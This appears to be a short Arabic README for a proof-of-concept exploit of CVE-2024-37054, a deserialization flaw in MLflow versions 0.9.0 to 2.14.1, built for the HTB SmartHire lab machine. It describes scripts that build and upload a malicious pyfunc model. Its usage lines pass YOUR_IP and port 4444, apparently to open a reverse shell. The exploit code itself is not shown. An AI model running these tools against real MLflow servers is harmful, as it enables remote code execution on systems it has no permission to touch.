
PoC لـ CVE-2024-37054
إثبات المفهوم لـ CVE-2024-37054، ثغرة أمنية خطيرة في إلغاء التسلسل في إصدارات MLflow من 0.9.0 إلى 2.14.1.
عند تحميل نموذج pyfunc خبيث عبر mlflow.pyfunc.load_model()، يتم تنفيذ حمولة مختزنة تُنفذ كودًا عشوائيًا.
exploit.py — استغلال كامل: تسجيل، تدريب، رفع، تشغيل (لآلة HTB SmartHire)build_model.py — بناء نموذج خبيث محليًا (بناء فقط)python3 build_model.py --lhost YOUR_IP --lport 4444
# تسجيل حساب تلقائيًا واستغلال
python3 exploit.py --lhost YOUR_IP --lport 4444 --atoz
# استخدام جلسة موجودة
python3 exploit.py --lhost YOUR_IP --lport 4444 --session "eyJjb21w..."
لأغراض تعليمية واختبار الاختراق المصرح به فقط.